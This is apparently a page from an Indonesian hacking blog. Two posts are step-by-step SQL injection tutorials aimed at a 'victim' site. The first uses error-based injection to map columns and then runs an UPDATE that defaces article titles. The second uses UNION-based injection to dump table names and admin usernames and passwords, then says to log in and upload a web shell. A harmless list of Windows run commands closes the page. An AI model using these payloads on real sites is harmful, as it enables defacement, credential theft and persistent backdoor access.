+Deface dengan SQL injection+

Nie gw kasih contoh nya.......

=> http://korban.site/artikel.asp?naskah_id=102

untuk mengetahui apakah web tersebut terkena bugs sql injection, kita akan menambahkan satu karakter ' setelah kode artikel mejadi

=> http://korban.site/artikel.asp?naskah_id=102'

Terjadi Error???

Microsoft OLE DB Provider for SQL Server error ‘80040e14'

Unclosed quotation mark before the character string ‘102' order by creationdate DESC’.

/artikel.asp, line 230

berarti bisa dipastikan klo website tersebut terkena bugs

terus qt coba lagi dgn menambahkan

having 1=1;–

mis :

=> http://korban.site/artikel.asp?naskah_id=102' having 1=1;–

maka akan terjadi errornya seperti ini


Microsoft OLE DB Provider for SQL Server error ‘80040e14''

Column ‘py_Naskah.naskah_id’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/artikel.asp, line 230


py_Naskah.naskah_id ini adalah nama tabel dan kolom database
py_Naskah => nama tabel
naskah_id => nama kolom

sekarang yg harus kita lakukan adalah mencari tabel berikutnya
mis :

=> http://korban.site/artikel.asp?naskah_id=102 group by py_Naskah.naskah_id having 1=1;–

terjadi error lagi???


Microsoft OLE DB Provider for SQL Server error ‘80040e14'

Column ‘py_Naskah.category’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/artikel.asp, line 230


sekarang kita dapat py_Naskah.category
berarti ditambahkan di urlnya
mis :

=> http://korban.site/artikel.asp?naskah_id=102' group by py_Naskah.category,py_Naskah.naskah_id having 1=1;–

error lagi????


Microsoft OLE DB Provider for SQL Server error ‘80040e14'

Column ‘py_Naskah.Publish’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/artikel.asp, line 230


rubah lagi urlnya menjadi

=> http://korban.site/artikel.asp?naskah_id=102' group by py_Naskah.category,py_Naskah.naskah_id,py_Naskah.Publish having 1=1;–

kita sudah dapat nama kolom judulnya yaitu : py_Naskah.title

untuk merubahnya

=> http://korban.site/artikel.asp?naskah_id=102' update py_Naskah set title=’Hacked by lxmp2t’;–

gitu aje. semoga bisa berguna dan dapat dipelajari oke...

Baca Selengkapnya...

Tutorial SQL Injection + Backdooring
--------------------------------------------------------
SQL Injection + Backdooring by Arob
--------------------------------------------------------
---->>> 1
Kita tetapkan target terlebih dahulu
contoh: [site]/news_Event/newsDetail.php?ID=2

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.
contoh:
[site]/news_Event/newsDetail.php?ID=-2 atau [site]/news_Event/newsDetail.php?ID=2'


---->>> 2
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+

contoh:
[site]//news_Event/newsDetail.php?ID=-2+order+by+1--

sekarang cek secara satu per satu
contoh:
[site]/news_Event/newsDetail.php?ID=-2+order+by+1--
[site]/news_Event/newsDetail.php?ID=-2+order+by+2--
[site]/news_Event/newsDetail.php?ID=-2+order+by+3--
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

sehingga muncul error atau hilang pesan error...
misal:
[site]/news_Event/newsDetail.php?ID=-2+order+by+5--

berarti yang kita ambil adalah sampai angka 4
menjadi
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--


--->>> 3

--->>> 3
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 5
maka:
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

ok ,yg keluar angka 2
gunakan perintah version() untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,version(),3,4--

lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema


--->>> 4
Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir

contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

seumpama yg kita cari adalah "admin"


--->>> 5
Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.
website yg digunakan untuk konversi :

http://tools.vyc0d.com/converter/

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646d696e

[site]news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e--


--->>> 6
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(0x3a,hasil isi column),3,4+from+(nama table berasal)--

contoh kata yang keluar adalah adminID,Name,password

maka
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(adminID,0x3a,Name,0x3a,password),3,4+from+admin--

Nah dah nemu ID dan password-nya sekarang Very Happy

ket: 0x3a sama dengan : <- titik dua --->>> 7
Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian
ENJOY........

Baca Selengkapnya...

Run Commands
Calc - Calculator
Cfgwiz32 - ISDN Configuration Wizard
Charmap - Character Map
Chkdisk - Repair damaged files
Cleanmgr - Cleans up hard drives
Clipbrd - Windows Clipboard viewer
Cmd - Opens a new Command Window (cmd.exe)
Control - Displays Control Panel
Dcomcnfg - DCOM user security
Debug - Assembly language programming tool
Defrag - Defragmentation tool
Drwatson - Records programs crash & snapshots
Dxdiag - DirectX Diagnostic Utility

Explorer - Windows Explorer
Fontview - Graphical font viewer
Ftp - ftp.exe program
Hostname - Returns Computer's name
Ipconfig - Displays IP configuration for all network adapters
Jview - Microsoft Command-line Loader for Java classes
MMC - Microsoft Management Console
Msconfig - Configuration to edit startup files
Msinfo32 - Microsoft System Information Utility
Nbtstat - Displays stats and current connections using NetBios over TCP/IP
Netstat - Displays all active network connections
Nslookup- Returns your local DNS server
Ping - Sends data to a specified host/IP
Regedit - registry Editor
Regsvr32 - register/de-register DLL/OCX/ActiveX
Regwiz - Reistration wizard
Sfc /scannow - Sytem File Checker
Sndrec32 - Sound Recorder
Sndvol32 - Volume control for soundcard
Sysedit - Edit system startup files (config.sys, autoexec.bat, win.ini, etc.)
Taskmgr - Task manager
Telnet - Telnet program
Tracert - Traces and displays all paths required to reach an internet host
Winipcfg - Displays IP configuration

Management Consoles

certmgr.msc - Certificate Manager
ciadv.msc - Indexing Service
compmgmt.msc - Computer management
devmgmt.msc - Device Manager
dfrg.msc - Defragment
diskmgmt.msc - Disk Management
fsmgmt.msc - Folder Sharing Management
eventvwr.msc - Event Viewer
gpedit.msc - Group Policy -XP Pro only
iis.msc - Internet Information Services
lusrmgr.msc - Local Users and Groups
mscorcfg.msc - Net configurations
ntmsmgr.msc - Removable Storage
perfmon.msc - Performance Manager
secpol.msc - Local Security Policy
services.msc - System Services
wmimgmt.msc - Windows Management

Baca Selengkapnya...